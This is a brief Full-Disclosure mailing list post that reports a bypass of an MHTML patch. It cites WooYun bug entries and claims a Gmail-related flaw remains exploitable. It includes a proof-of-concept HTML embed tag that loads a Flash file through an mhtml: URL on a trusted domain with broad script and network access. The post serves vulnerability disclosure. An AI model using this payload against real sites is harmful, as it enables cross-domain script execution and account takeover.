Hi someone report a case about bypass mhtml patch
http://www.wooyun.org/bugs/wooyun-2010-01929 <embed type="application/x-shockwave-flash" src="mhtml: http://trusteddomain.com/wooyun.jpg!wooyun.swf" allowNetworking=all AllowScriptAccess=samedomain width=500 height=500></embed> some VUL like http://www.wooyun.org/bugs/wooyun-2010-01474 (gmail hack) will stiil be exploitable credits: http://www.wooyun.org/whitehats/latentwind :)
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/